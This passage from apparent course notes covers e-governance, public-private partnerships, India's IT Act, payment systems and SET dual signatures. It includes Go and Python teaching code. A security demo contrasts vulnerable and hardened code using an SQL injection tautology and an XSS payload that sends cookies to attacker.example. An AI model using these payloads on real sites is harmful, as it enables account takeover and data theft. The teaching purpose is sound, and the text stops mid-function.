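// of the last logSize entries. Layout is constructed, not the Mondex format.
type Card struct {
	ID      string
	Balance int64
	ring    [logSize]Entry
	written int // entries ever written; once > logSize the oldest are overwritten
}

// Transfer is a card-to-card, offline payment: value leaves one chip and
// arrives on the other with no bank in the path, and both chips log it.
func Transfer(from, to *Card, amount int64) error {
	if amount <= 0 {
		return errors.New("amount must be positive")
	}
	if from.Balance < amount {
		return errors.New("insufficient value on card")
	}
	from.Balance -= amount
	to.Balance += amount
	from.record(Entry{to.ID, -amount})
	to.record(Entry{from.ID, amount})
	return nil
}

func (c *Card) record(e Entry) {
	c.ring[c.written%logSize] = e
	c.written++
}

// Log returns the surviving records, oldest first.
func (c *Card) Log() []Entry {
	n := c.written
	if n > logSize {
		n = logSize
	}
	out := make([]Entry, 0, n)
	for i := 0; i < n; i++ {
		out = append(out, c.ring[(c.written-n+i)%logSize])
	}
	return out
}

// Lost is how many records have already been overwritten since the last
// upload: they can no longer be retrieved by an ATM or retailer upload.
func (c *Card) Lost() int {
	if c.written > logSize {
		return c.written - logSize
	}
	return 0
}

// Upload hands the surviving log to the bank (as at an ATM) and clears it.
func (c *Card) Upload() []Entry {
	log := c.Log()
	c.written = 0
	return log
}

// Reconcile is the bank-side audit: the uploaded records must explain the
// balance change since the previous upload. It fails exactly when overflow
// has discarded records, which is the gap critics point to.
func Reconcile(balanceAtLastUpload int64, log []Entry, balanceNow int64) bool {
	var sum int64
	for _, e := range log {
		sum += e.Delta
	}
	return balanceAtLastUpload+sum == balanceNow
}

func main() {
	// Constructed scenario: twelve offline payments between two uploads.
	alice := &Card{ID: "card-A", Balance: 10000}
	bob := &Card{ID: "card-B", Balance: 0}
	for i := 0; i < 12; i++ {
		_ = Transfer(alice, bob, 100)
	}
	fmt.Println(alice.Lost())                                    // 2
	fmt.Println(Reconcile(10000, alice.Upload(), alice.Balance)) // false: two records gone
}
```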

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance

Both the terms are treated to be the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to be congruent with a definition of e-governance, is that there is no provision for governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have actually reached them. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budget for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or anywhere, through the network. This is because of the characteristics of CORBA: it is a location transparent, language independent, implementation independent and Operating System independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, or any new Web application, or could even be a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community (providers of goods and services) to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and incre▁ases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

- Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
- Generally, but not always, involving:
  o Long Term Contracts
  o User Charges and/or Payments flowing between the Parties
  o Shared Investments, but Mainly Private
  o Risk Sharing by the Parties
- Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them

- Fiscal Head Room
- As a Way of Financing the Project
- Separate Policy & Regulation from Operations
- Make the Good or Service Available
- Pay for Performance and Output
- Introduce Competition: For and In the Market


The Need to Set the Right Priorities

Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:

- Shared goals
- Shared resources (time, money, expertise, people)
- Shared risks
- Shared benefits

Benefits

- Expedited project completion
- Project cost savings
- Improved quality
- Use of private resources
- Access to new sources of private capital

Two Major Steps

- Crafting the Partnership
- Implementing the Partnership

Project Management

Six Distinct Phases

1. Genesis
  o What's the need?
  o What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit
  o Is there a need for a Public/Private Partnership?
  o Preliminary Project Definition

2. Feasibility
  o Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
  o Market Research
  o Economic/Financial Analysis
  o Program, Budget and Schedule
  o Risk Analysis

3. Plan and Test
  o Final project definition
  o What is the best way to complete the project?
  o Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback and economics?
  o Master Schedule/Budget
  o Political Climate
  o Any potential "fatal flaws" that could derail the project?

4. Procurement and Contracting
  o How do you choose and contract with the best-value private partner?
  o What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
  o What do current statutes allow?
  o Procurement Approach: Sole Source, RFP, Low Bid
  o Risk Allocation between Public and Private Partners
  o Structuring of Contract: Risks and Rewards

5. Implement
  o Environmental
  o Design
  o Permitting
  o Construction
  o Commissioning and Administration

6. Operate
  o Startup
  o Monitoring
  o Assessment
  o Enhancement
  o Contract Modifications
  o Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms) and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites, one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of this service.

2. INFORMATION SECURITY

A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

- understanding an organization's information security requirements and the need to establish policy and objectives for information security;
- implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
- monitoring and reviewing the performance and effectiveness of the ISMS;
- continual improvement based on objective measurement.

Data security requires a set of security requirements:

- Authentication: capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.
- Authorization: capability to give rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.
- Confidentiality: capability to prevent unauthorized access to information.
- Integrity: capability to prevent information from unauthorized modification and to ensure that information can be relied upon and is accurate and complete.
- Traceability: capability to chronologically interrelate any transaction to a person or system that performed the action, in a way that is verifiable.
- Non-repudiation: capability to prevent the intervening person or system in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are shown below:

- Protecting premises, equipment and systems software, including input-output units
- Protecting software applications used to process personal data
- Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks
- Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data
- Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals

3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis

Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness

Continually improve its control environment Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
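The two flaws named above, each in a vulnerable form next to its hardened form, as an added example written for this page (not code from any e-Government portal or from the cited study). The login table and its rows are constructed sample data held in an in-memory SQLite database; the payload is the classic tautology string. Note that `html.escape` is the right fix only for an HTML-body context; attribute and JavaScript contexts need their own encoding.

```python
"""Added example: SQL injection and XSS, vulnerable vs. hardened, on constructed data."""
import html
import sqlite3

# Constructed sample data standing in for a citizen-portal login table.
SAMPLE_USERS = [
    ("alice", "s3cret-1", "citizen"),
    ("bob", "s3cret-2", "citizen"),
    ("admin", "s3cret-3", "administrator"),
]


def make_db():
    """Create an in-memory database populated with the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, name, password):
    """Builds the query by string concatenation: attacker-controlled text becomes SQL."""
    query = ("SELECT name, role FROM users WHERE name = '" + name +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchall()


def login_hardened(conn, name, password):
    """Parameterised query: the driver sends values separately from the SQL text,
    so quotes in the input can never change the statement's structure."""
    query = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchall()


def greeting_vulnerable(display_name):
    """Reflects user input straight into HTML: a reflected or stored XSS sink."""
    return "<p>Welcome, " + display_name + "</p>"


def greeting_hardened(display_name):
    """Escapes the HTML metacharacters (& < > " ') before the value enters the page."""
    return "<p>Welcome, " + html.escape(display_name, quote=True) + "</p>"


if __name__ == "__main__":
    conn = make_db()
    # Tautology payload: the leading quote closes the string literal and
    # the appended OR '1'='1' makes the WHERE clause true for every row.
    payload = "' OR '1'='1"
    print("vulnerable:", login_vulnerable(conn, payload, payload))   # every user
    print("hardened:  ", login_hardened(conn, payload, payload))     # no rows
    script = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
    print(greeting_vulnerable(script))   # script tag reaches the browser intact
    print(greeting_hardened(script))     # rendered as inert text
```

The vulnerable login returns all three rows because SQLite evaluates `name = '' OR '1'='1' AND password = '' OR '1'='1'` as true for every row; the parameterised version returns none, since the whole payload is compared as a literal string.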

Specific security measures such as firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented so that government agencies provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order or any unjust or shameful act. An "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are examples where computers are used to commit a crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of the crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

• 121 million Internet users
• 65 million active Internet users, up by 28% from 51 million in 2010
• 50 million users shop online on e-commerce and online shopping sites
• 46+ million social network users
• 346 million mobile users had subscribed to data packages

CYBER LAW

Section 66 (IT Act 2000, as originally enacted) – Hacking with computer system

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Section 43 – Penalty for damage to computer, computer system, etc.

Whoever, without permission of the owner of the computer:

• secures access;
• downloads, copies or extracts any data, computer database or information;
• introduces or causes to be introduced any virus or contaminant;
• disrupts or causes disruption;
• denies or causes denial of access to any person;
• provides any assistance to any person to facilitate access;
• charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;
• destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means;
• steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 66 (as amended in 2008) – Computer related offences

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S.66]

S.66A – Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device,

(a) any information that is grossly offensive or has menacing character; or

(b) any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes use of such computer resource or a communication device; or

(c) any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S.66C – Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S.66D – Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S.66E – Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S.67A – Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S.67C – Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."

IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. The Act has been opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act provides additional focus on information security; it added several new sections on offences, including cyber terrorism and data protection. A set of Rules relating to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters; four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences

Section 65 – Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force.
Punishment: imprisonment up to three years, or fine up to 2 lakh rupees, or both.

Section 66 – Hacking (computer related offences).
Punishment: imprisonment up to three years, or fine up to 5 lakh rupees, or both.

Section 66-A – Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages.
Punishment: imprisonment up to three years and with fine.

Criticisms

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government / State Government or its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized; it has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime. (Section 66A was subsequently struck down as unconstitutional by the Supreme Court of India in Shreya Singhal v. Union of India, 24 March 2015.)

1. The regulator has mandated routing all high-value transactions electronically to minimize the movement of money and risk.

2. At the retail end, customers are realizing the efficiency of electronic payments.

SHIFTS IN THE PAYMENT SYSTEM

TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT

• Electronic Clearing Service (Credit and Debit)
• National Electronic Fund Transfer (NEFT)

THE RULING PLASTIC MONEY

• Credit cards
• Debit cards
• ATM cards

PayPal

PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods such as checks and money orders. It is subject to the US economic sanctions list and other rules and interventions required by US laws or government. PayPal is an acquirer, performing payment processing for online vendors, auction sites and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States, at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Scottsdale, Charlotte and Austin in the United States; Chennai in India; Dublin in Ireland; Kleinmachnow in Germany; and Tel Aviv in Israel. From July 2007, PayPal has operated across the European Union as a Luxembourg-based bank.

Google Wallet

Google Wallet was launched in 2011, serving a similar function to PayPal: facilitating payments and transferring money online. It also features strong security measures and additional features such as the ability to send payments as attachments via email.

CHARACTERISTICS OF PAYMENT SYSTEM

• There is no paper involved, so electronic payments can be effected directly from home or office.

• Fast, efficient, safe, secure and generally less costly than paper-based alternatives, e.g. cheques.

• Electronic payments are fully traceable.

• In Ireland, the clearing time for standard electronic payments is next-day value for interbank transfers, subject to the payment instruction being received ahead of 'shut-off' times, which can vary from bank to bank. Payment instructions received after the 'shut-off' time will be processed one working day later.

• Most banks offer same-day value for payments made to other accounts held in that same bank.

• Many banks offer same-day money transfer inter-bank services for large-value payments.

• Unlike cheques, electronic payments don't 'bounce', as payments will not be effected unless the funds are available in the first place.

Features of Payment Methods

• Anonymity: whether the payment method is anonymous.
• Security: whether the payment method is secure.
• Overhead cost: the overhead cost of processing a payment.
• Transferability: whether a payment can be carried out without the involvement of a third party.
• Divisibility: whether a payment can be divided into arbitrarily small payments whose sum is equal to the original payment.
• Acceptability: whether the payment method is supported globally.

4C PAYMENTS METHODS

To make the e-commerce system functional, we also need to incorporate payment functions into the system.

In the physical world there are 4 types of payment methods:

• Cash
• Credit card
• Check
• Credit/debit (fund transfer)

A payment method should be:

– very secure
– of low overhead cost
– transferable
– acceptable anywhere
– divisible
– anonymous

Comparison of the 4C payment methods

SET PROTOCOL FOR CREDIT CARD PAYMENT

• The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.

• Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL

• It ensures the secure transmission of credit card information over the Internet (confidentiality and integrity between the browser and the merchant's server only).

Disadvantage of SSL

• It is not a complete credit card payment method.

• For example, it does not itself provide on-line credit card authorization, and the merchant sees the card number in the clear at its end.

SET (Secure Electronic Transaction) was specially developed to provide secure credit card payment over the Internet. It was backed by the major credit card companies, including Visa and MasterCard. (In practice SET saw little deployment and has since been superseded by schemes such as 3-D Secure, but its design remains a useful case study.)

• SET aims at satisfying the following security requirements in the context of credit card payment:

– Confidentiality: sensitive messages are encrypted so that they are kept confidential.
– Integrity: nearly all messages are digitally signed to ensure content integrity.
– Authentication: authentication is performed through a public key infrastructure.

SET network architecture

• Merchant: a seller, which is connected to an acquirer.
• Cardholder: a registered holder of the credit card, who is a buyer.
• Issuer: the bank that issues the credit card to a cardholder.
• Acquirer: the bank that serves as an "agent" to link a merchant to multiple issuers. A merchant can process various credit cards through a single acquirer.
• Payment Gateway: typically connected to the acquirer. The payment gateway is situated between the SET system and the financial network of the existing credit card system, for processing the credit card payment.

SET Digital Certificate System

Dual signature generation and verification

• In the physical credit card system:
– the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential;
– data integrity can basically be ensured by using printed receipts;
– cardholder authentication relies on simple signature checking only.

• In an electronic credit card system:
– the Order Information (OI) and PI can be digitally signed to ensure data integrity;
– but the sensitive credit card information may still be disclosed to other people (in particular, the merchant would see the PI).

• SET introduces a method called the dual signature (DS) to ensure data integrity while protecting the sensitive information. The cardholder hashes OI and PI separately, concatenates the two digests, hashes the result again, and signs that final digest with its private signature key:

DS = Sign_RSA( H[ H[PI] || H[OI] ], key_private_sign_cardholder )

How the merchant and the payment gateway can verify the DS

• The merchant is provided with OI, H[PI] and DS.

• The dual signature can be verified as follows:

Step 1: The merchant first computes H[OI] from the OI it received and forms
  H[ H[PI] || H[OI] ]

Step 2: It then recovers the signed digest by applying the cardholder's public signature key to the signature:
  D_RSA[ DS, key_public_sign_cardholder ]
  where key_public_sign_cardholder is the public signature key of the cardholder.

Step 3: Finally it compares the two values, H[ H[PI] || H[OI] ] and D_RSA[ DS, key_public_sign_cardholder ]. They should be the same if the transmitted DS (and the OI) has not been changed; otherwise the order is not valid.

• The payment gateway is provided with PI, H[OI] and DS, and verifies symmetrically: it computes H[PI] itself, forms H[ H[PI] || H[OI] ] and compares it with D_RSA[ DS, key_public_sign_cardholder ].

• By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party: the merchant never sees the PI and the gateway never sees the OI, yet each can check that the part it holds belongs to the same signed transaction.

• If either the OI or PI is changed, the dual signature will no longer be valid.
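The dual-signature scheme described above, carried through in code as an added example written for this page (it is not code from the original notes or from the SET specification). SHA-256 stands in for SET's SHA-1, the signature is textbook (unpadded) RSA over the digest with keys generated locally by a small Miller-Rabin routine, and the OI and PI are constructed sample messages; production code would use a vetted library with PKCS#1 padding. The three functions correspond to the three parties: the cardholder signs, the merchant verifies with OI and H[PI], and the gateway verifies with PI and H[OI].

```python
"""Added example: SET dual signature with toy RSA (not production cryptography)."""
import hashlib
import math
import secrets


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


# --- toy RSA key generation -------------------------------------------------
def _is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin primality test."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = 2 + secrets.randbelow(n - 3)          # witness in [2, n-2]
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int) -> int:
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1   # full length, odd
        if _is_probable_prime(cand):
            return cand


def generate_keypair(bits: int = 1024):
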